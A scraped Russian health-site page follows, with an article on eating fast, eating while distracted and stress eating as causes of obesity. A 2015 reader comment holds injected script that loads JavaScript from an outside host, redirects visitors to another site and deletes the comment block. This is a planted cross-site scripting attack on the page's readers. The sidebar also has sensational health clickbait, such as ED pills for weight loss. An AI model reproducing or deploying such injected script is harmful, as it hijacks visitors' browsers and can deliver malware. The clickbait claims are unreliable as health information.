Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ошибки в еде, ведущие к о...  >>  Ошибки в еде, ведущие к ожирению
 
Обратная связь
 

Ошибки в еде, ведущие к ожирению

Размер шрифта
30 мая 2012 09:00
  • google_analytics: false
  • Нравится

Хотя прием пищи это важная составляющая нашей жизни, но не все люди умеют правильно есть. О трех самых грубых ошибках в приеме пище – в нашей статье.

1

Ошибка первая. Прием пищи наспех

Когда человек ест быстро, то сигналы от рецепторов в желудке не успевают достигнуть мозга, и человек не ощущает насыщения. В результате человек съедает в два раза больше еды, чем, если бы он ел медленно.

Что делать

Есть нужно в приятной спокойной обстановке, медленно пережевывая пищу (как минимум 20 жевательных движений перед проглатыванием), получая от еды удовольствие. Такой способ поглощения пищи не приведет к ожирению и во время такого обеда человек расслабляется и отдыхает по-настоящему.

Мозгу требуется время, чтобы понять что вы поели. Поэтому медленный прием пищи с тщательным пережевыванием еды даст мозгу время для получения сигнала о насыщении.

Ошибка вторая. Неспособность сосредоточиться на еде

Часто во время еды человек занимается другими делами. В этом случае мозгу значительно сложнее получать информацию о том, что человек ест и как он это делает. В результате человек не насыщается, вырабатывается меньше эндорфинов – гормона радости – и человек не получает от еды удовольствия. Также человек не следит за объемом съеденной пищи и за качеством ее пережевывания, т.е. он съедает слишком много, недостаточно подготовив пищу для дальнейшего переваривания. Человек перестает есть не когда он сыт, а когда заканчивает свое занятие (работу, просмотр телевизора и т.д.).

Что делать

Во время приема пищи нужно полностью сосредоточиться на еде, отложив любые дела. Только в этом случае человек поглотит еду в достаточном, для утоления голода, объеме и еда пойдет на пользу. В результате вдумчивого приема пищи ожирение не разовьется.

Ошибка третья. Поглощение еды в состоянии стресса

Во время стресса происходит мгновенная мобилизация эволюционно выработанных механизмов защиты человека. Прежде всего, при стрессовой ситуации надпочечниками выбрасывается гормон кортизол, способный активно менять биохимию организма человека: потребность в глюкозе резко возрастает, поэтому человек нуждается в еде. Спустя какое-то короткое время глюкоза превращается в жир и человек снова хочет есть.

Есть и еще один негативный момент. После приема пищи, получив энергию, человек не двигается, а значит, не расходует ее, это еще одна причина, почему развивается ожирение, а вслед за ним сахарный диабет, атеросклероз, инфаркт или инсульт.

Что делать

Если во время стресса вам хочется есть, выпейте воды. Но, если вы все-таки поели, – обеспечьте организму физическую нагрузку.

Не пренебрегайте правильным приемом пищи и не делайте культа из еды, относитесь к ней с уважением!



Сюжеты по теме:
Самые грубые ошибки в еде

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мифы про мясо. Не питайтесь иллюзиями!   Самые популярные мифы о диабете   Как добавить 20 лет к жизни   Как спрятать второй подбородок  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 28 июня 2013Хотите похудеть – пейте таблетки от эректильной дисфункции!
 

Слайдшоу

1
Еда, которая вызывает рак и ожирение! Вы едите ее каждый день!
Как нас обманывают! Продукты-обманщики!
Неожиданные враги печени

Тесты

1
Есть ли у вас избыточный вес?
Жиры, которые мы едим
Знаете ли вы, как работает ваш желудок?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.